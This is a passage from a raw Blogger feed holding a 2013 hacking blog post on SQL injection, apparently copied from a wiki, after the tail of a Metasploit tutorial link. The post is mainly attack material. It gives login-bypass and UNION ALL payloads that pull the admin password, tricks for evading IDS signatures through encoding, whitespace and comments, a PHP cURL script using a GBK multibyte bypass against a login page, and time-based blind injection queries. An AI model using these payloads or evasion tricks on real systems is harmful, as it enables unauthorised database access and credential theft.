&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; font-family: Georgia, serif; font-size: 12pt; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background-color: white; border: 0px; font-family: &#39;Lucida Grande&#39;, Arial, Helvetica, sans-serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;span style=&quot;background-color: transparent; border: 0px; font-family: Georgia, serif; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;a href=&quot;http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;here&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/8041782033702950218/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/metasploit-tutorial.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/8041782033702950218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/8041782033702950218'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/metasploit-tutorial.html' title='Metasploit '/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm3k2AI0MrjLGhCv41PXJgC5lLcYHJPHjnCQoMTeqGUCr16pZ4_XdDnNL25ew0vquGItJzvpLE2cuX9Fq163VGXt2yCsyK6w962LvHZqSXQaeAaUnwH1hl7p4k-_Jgu46N5oib2WqpBUlr/s72-c/bt4start.JPG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-720501904039702545</id><published>2013-07-20T08:23:00.001-07:00</published><updated>2013-07-29T05:22:19.799-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web"/><title type='text'>SQL injection</title><content type='html'>&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;b&gt;&lt;i&gt;SQL Injection&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.046875px; margin-bottom: 0.5em; margin-top: 0.4em;&quot;&gt;
&lt;b&gt;SQL Injection&lt;/b&gt;&amp;nbsp;is one of the more popular application layer hacking techniques that is used in the wild today. It is a trick that exploits poorly filtered or not correctly escaped SQL queries into parsing variable data from user input. The idea behind SQL injection is to convince the SQL application (whether MySQL, MSSQL, PostgreSQL, ORACLE etc) to run an SQL string that was not premeditated.&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&#39;&#39;&#39;SQL Injection&#39;&#39;&#39; is one of the more popular application layer hacking techniques that is used in the wild today. It is a trick that exploits poorly filtered or not correctly escaped SQL queries into parsing variable data from user input. The idea behind SQL injection is to convince the SQL application (whether MySQL, MSSQL, PostgreSQL, ORACLE etc) to run an SQL string that was not premeditated.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
==Severity==&lt;/div&gt;
&lt;div&gt;
Relatively High&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
==Exploit Likeliness==&lt;/div&gt;
&lt;div&gt;
Moderate&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
==SQL Injection Types==&lt;/div&gt;
&lt;div&gt;
There are a number of categorized SQL injection types that can be executed with a web-browser. They are:&lt;/div&gt;
&lt;div&gt;
* Poorly Filtered Strings&lt;/div&gt;
&lt;div&gt;
* Incorrect Type Handling&lt;/div&gt;
&lt;div&gt;
* Signature Evasion&lt;/div&gt;
&lt;div&gt;
* Filter Bypassing&lt;/div&gt;
&lt;div&gt;
* Blind SQL Injection&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===Poorly Filtered Strings===&lt;/div&gt;
&lt;div&gt;
SQL injections based on poorly filtered strings are caused by user input that is not filtered for escape characters. This means that a user can input a variable that can be passed on as an SQL statement, resulting in database input manipulation by the end user.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Code that is vulnerable to this type of vulnerability might look something like this:&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://lastwatchdog.com/wp/wp-content/uploads/sql_img.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://lastwatchdog.com/wp/wp-content/uploads/sql_img.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$pass = $_GET[&#39;pass&#39;];&lt;/div&gt;
&lt;div&gt;
$password = mysql_query(&quot;SELECT password FROM users WHERE password = &#39;&quot;. $pass . &quot;&#39;;&quot;);&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The query above is an SQL call to SELECT the password from the users database, with the password value being that of $var. If the user were to input a password that was especially designed to continue the SQL call, it may result in results that were not aforethought. An injection for this may look something like:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;io&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
&#39; OR 1 = 1 /*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Inserting the above into the form will result in the query being extended with an OR statement, resulting in a final query of:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
SELECT password FROM users WHERE password = &#39;&#39; OR 1 = 1 /*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Because of the OR statement in the SQL query, the check for password = $var is insignificant as 1 does equal 1, thus the query will return TRUE, resulting in a positive login.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===Incorrect Type Handling===&lt;/div&gt;
&lt;div&gt;
Incorrect type handling based SQL injections occur when an input is not checked for type constraints. An example of this would be an ID field that is numeric, but there is no filtering in place to check that the user input is numeric. is_numeric() should always be used when the field type is explicitly supposed to be a number. An example of code that will not be subject to incorrect type handling injection is:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
(is_numeric($_GET[&#39;id&#39;])) ? $id = $_GET[&#39;id&#39;] : $id = 1;&lt;/div&gt;
&lt;div&gt;
$news = mysql_query( &quot;SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3&quot; );&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above code checks that $_GET[&#39;id&#39;] is a number, if TRUE returns $id = $_GET[&#39;id&#39;], and if FALSE sets $id to 1. This kind of filtering will assure that the ID field is always numeric.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===Signature Evasion===&lt;/div&gt;
&lt;div&gt;
Many SQL injections will be &#39;&#39;somewhat&#39;&#39; blocked by intrusion detection and intrusion prevention systems using signature detection rules. Common programs that detect SQL injections are mod_security for Apache and Snort. These programs aren&#39;t fool proof and as such, the signatures can be evaded. There are many methods that can be used to bypass signature detection, some of which will be described here.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
====Different Encoding====&lt;/div&gt;
&lt;div&gt;
Signature evasion can be made possible with a number of encoding tricks.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
One basic and common encoding trick is the use of URL encoding. URL encoding would change an injection string that would normally look like the following:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;NULL OR 1 = 1/*&amp;lt;/source&amp;gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
To a URL encoded string that would be masked as:&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;NULL+OR+1%3D1%2F%2A&amp;lt;/source&amp;gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Thus the installed IDS system may not register the attack, and the signature will be evaded.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
====White Space Multiplicity====&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
As common signature databases check for strings such as &quot;OR &quot; (OR followed by a space), it is possible to evade these signatures using different spacing techniques. These techniques can be the use of tabs, new lines/carriage return line feeds, and a variety of other white spaces.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
If a signature is checking for OR followed by a space, it is possible to insert a new line as a space, which would be possible using the %0a value within a URL bar. Thus an injection that would normally look like:&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;NULL OR &#39;value&#39;=&#39;value&#39;/*&amp;lt;/source&amp;gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The whitespace within the injection would be replaced by a new line, looking like:&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;NULL%0aOR%0a&#39;value&#39;=&#39;value&#39;/*&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Would now appear to the server as:&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;NULL&lt;/div&gt;
&lt;div&gt;
OR&lt;/div&gt;
&lt;div&gt;
&#39;value&#39;=&#39;value&#39;/*&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
The above string would then bypass the intrusion detection/prevention system and be executed within the MySQL server.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
====Arbitrary String Patterns====&lt;/div&gt;
&lt;div&gt;
In MySQL, comments can be inserted into a query using the C syntax of /* to start the comment, and */ to end the comment. These comment strings can be used to evade signature detection of common words such as UNION, or OR. The following injection pattern may be picked up by an IDS:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT user,pass, FROM user_db WHERE user LIKE &#39;%admin%/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
However, the same IDS may not detect the injection if keywords were commented as follows:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL/**/UNION/**/ALL/**/SELECT/**/user,pass,/**/FROM/**/user_db/**/WHERE/**/uid/**/=/*evade*/&#39;1&#39;//&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above breaks up keywords that an IPS such as Apache&#39;s mod_security would normally detect, allow the SQL injection attack to parse, and database tables to be read. Of course, an IDS will be able to check for strings of /* and */, however, a lot of sites, including blogging sites, pastebins, news sites etc may need to use C commenting blocks, resulting in a false positive.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===Filter Bypassing===&lt;/div&gt;
&lt;div&gt;
====addslashes() &amp;amp; magic_quotes_gpc====&lt;/div&gt;
&lt;div&gt;
In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are constructed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (&#39;) following a 0xbf (¿); ¿&#39;.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;?php&lt;/div&gt;
&lt;div&gt;
$url &amp;nbsp; &amp;nbsp; = &quot;http://www.victimsite.com/login.php&quot;;&lt;/div&gt;
&lt;div&gt;
$ref &amp;nbsp; &amp;nbsp; = &quot;http://www.victimsite.com/index.php&quot;;&lt;/div&gt;
&lt;div&gt;
$session = &quot;PHPSESSID=abcdef01234567890abcdef01&quot;;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
$ch &amp;nbsp; &amp;nbsp; &amp;nbsp;= curl_init();&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
curl_setopt( $ch, CURLOPT_URL, &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$url &amp;nbsp; &amp;nbsp; );&lt;/div&gt;
&lt;div&gt;
curl_setopt( $ch, CURLOPT_REFERER, &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$ref &amp;nbsp; &amp;nbsp; );&lt;/div&gt;
&lt;div&gt;
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE &amp;nbsp; &amp;nbsp; );&lt;/div&gt;
&lt;div&gt;
curl_setopt( $ch, CURLOPT_COOKIE, &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $session );&lt;/div&gt;
&lt;div&gt;
curl_setopt( $ch, CURLOPT_POST, &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; TRUE &amp;nbsp; &amp;nbsp; );&lt;/div&gt;
&lt;div&gt;
curl_setopt( $ch, CURLOPT_POSTFIELDS, &amp;nbsp; &amp;nbsp; &quot;username=&quot; .&lt;/div&gt;
&lt;div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; chr(0xbf) . chr(0x27) .&lt;/div&gt;
&lt;div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &quot;OR 1=1/*&amp;amp;submit=1&quot; );&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
$data = curl_exec( $ch );&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
print( $data );&lt;/div&gt;
&lt;div&gt;
curl_close( $ch );&lt;/div&gt;
&lt;div&gt;
?&amp;gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
====mysql_real_escape_string()====&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===Blind SQL Injection===&lt;/div&gt;
&lt;div&gt;
Most good production environments do not allow you to see output in the form of error messages or extracted database fields whilst conducting SQL injections, these injections are known as &#39;&#39;&#39;Blind SQL Injections&#39;&#39;&#39;. They are titled &#39;&#39;Partially Blind Injections&#39;&#39; and &#39;&#39;Totally Blind Injections&#39;&#39;.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&#39;&#39;Partially Blind Injections&#39;&#39; are injections where you can see slight changes in the resulting page, for instance, an unsuccessful injection may redirect the attacker to the main page, where a successful injection will return a blank page.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&#39;&#39;Totally Blind Injections&#39;&#39; are unlike Partially Blind Injections in that they don&#39;t produce difference in output of any kind. This is still however injectable, though it&#39;s harder to determine whether an injection is actually taking place ([[Black Box Testing]] will be useless in these cases, only [[White Box Testing]] and [[Grey Box Testing]] will have any use in Blind SQL Injections).&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
====MySQL BENCHMARK====&lt;/div&gt;
&lt;div&gt;
Using MySQL&#39;s BENCHMARK will enable an attacker to determine whether an injection point is vulnerable or not. The BENCHMARK technique is basically abusing the function and if one isn&#39;t careful, can and will overload the server. However, as MySQL has no delay functions, injecting a string using BENCHMARK that will take 30 seconds to complete is a sure way of ascertaining data that would normally be hard to acquire in a Blind Injection with MySQL.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
UNION ALL SELECT BENCHMARK(10000000,ENCODE(&#39;xyz&#39;,&#39;987&#39;));&lt;/div&gt;
&lt;div&gt;
/*the above will take about 5 seconds on localhost*/&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
UNION ALL SELECT BENCHMARK(1000000,MD5(CHAR(118)))&lt;/div&gt;
&lt;div&gt;
/*the above will take about 7 seconds on localhost*/&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
UNION ALL SELECT BENCHMARK(5000000,MD5(CHAR(118)))&lt;/div&gt;
&lt;div&gt;
/*the above will take about 35 seconds on localhost*/&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Once the above determines whether or not the injection point is vulnerable, it is possible to use IF statements to determine table names, and field values as such:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
UNION ALL SELECT IF( username = &#39;admin&#39;, BENCHMARK(1000000,MD5(CHAR(118))),NULL) FROM users/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above will check for the username of admin and set a delay if the query returns true.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
====MSSQL WAITFOR DELAY====&lt;/div&gt;
&lt;div&gt;
MSSQL&#39;s WAITFOR DELAY function allows an injection that is not CPU intensive, and will not overload the server. This technique is much safer than MySQL&#39;s BENCHMARK technique. It is possible to use the WAITFOR DELAY function in an injection to stall the server and determine whether an injection point is vulnerable or not.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;sql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
WAITFOR DELAY &#39;0:0:10&#39;--&lt;/div&gt;
&lt;div&gt;
/* The above will set a delay of 10 seconds */&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
WAITFOR DELAY &#39;0:0:0.5&#39;--&lt;/div&gt;
&lt;div&gt;
/* It is also possible to use fractions, however,&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&amp;nbsp; &amp;nbsp; in a blind injection fractions aren&#39;t very useful*/&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above are examples of the WAITFOR DELAY syntax. A real life injection may look more like the following:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;sql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
; IF EXISTS(SELECT * FROM user_db) WAITFOR DELAY &#39;0:0:10&#39;--&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above will enable us to determine whether the database “user_db” exists or not.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
====PostgreSQL pg_sleep()====&lt;/div&gt;
&lt;div&gt;
Like MSSQL, PostgreSQL has a non CPU intensive function that allows an attacker to determine whether or not an injection point is vulnerable or not. This function is pg_sleep(). pg_sleep() can be set to determine how many seconds the server will sleep for. The following demonstrates the use of pg_sleep() to sleep for 10 seconds:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=sql&amp;gt;&lt;/div&gt;
&lt;div&gt;
SELECT pg_sleep(10);&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
==SQL Injection Techniques==&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===UNION Statements===&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The &#39;&#39;UNION&#39;&#39; statement in SQL is used to select information from two SQL tables. When using the UNION command all selected columns need to be of the same data type. The UNION ALL statement however, allows columns of all data types to be selected.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The &#39;&#39;UNION ALL&#39;&#39; statement can be used as an &#39;&#39;SQL Injection&#39;&#39; vector where an unsanitized &amp;nbsp;dynamic script calls for data from a table such as news, and the UNION ALL statement is used modify and expand the SQL call. A script vulnerable to this type of injection may have a URI string that looks a little something like ./news.php?id=1338, and it&#39;s source may look similar to this:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$id = $_GET[&#39;id&#39;];&lt;/div&gt;
&lt;div&gt;
$news = mysql_query( &quot;SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3&quot; );&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Due to the lack of filtering in $id variable, it is vulnerable to an SQL injection, including a UNION ALL injection such as:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT password FROM users WHERE username = &#39;admin&#39;/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above would result in the following SQL query:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
SELECT * FROM `news` WHERE `id` = NULL UNION ALL SELECT password FROM users WHERE username = &#39;admin&#39;/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
This would result in a NULL value being called instead of the news ID, and the password of the account named &#39;admin&#39; being echoed in it&#39;s place.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===ORDER BY Statements===&lt;/div&gt;
&lt;div&gt;
Using the &#39;&#39;ORDER BY&#39;&#39; SQL statement within an SQL injection allows an attacker to determine the number of columns within a query. It sorts the column number called within the statement in an ascending order. An ORDER BY injection would look like the following:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
ORDER BY 5/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
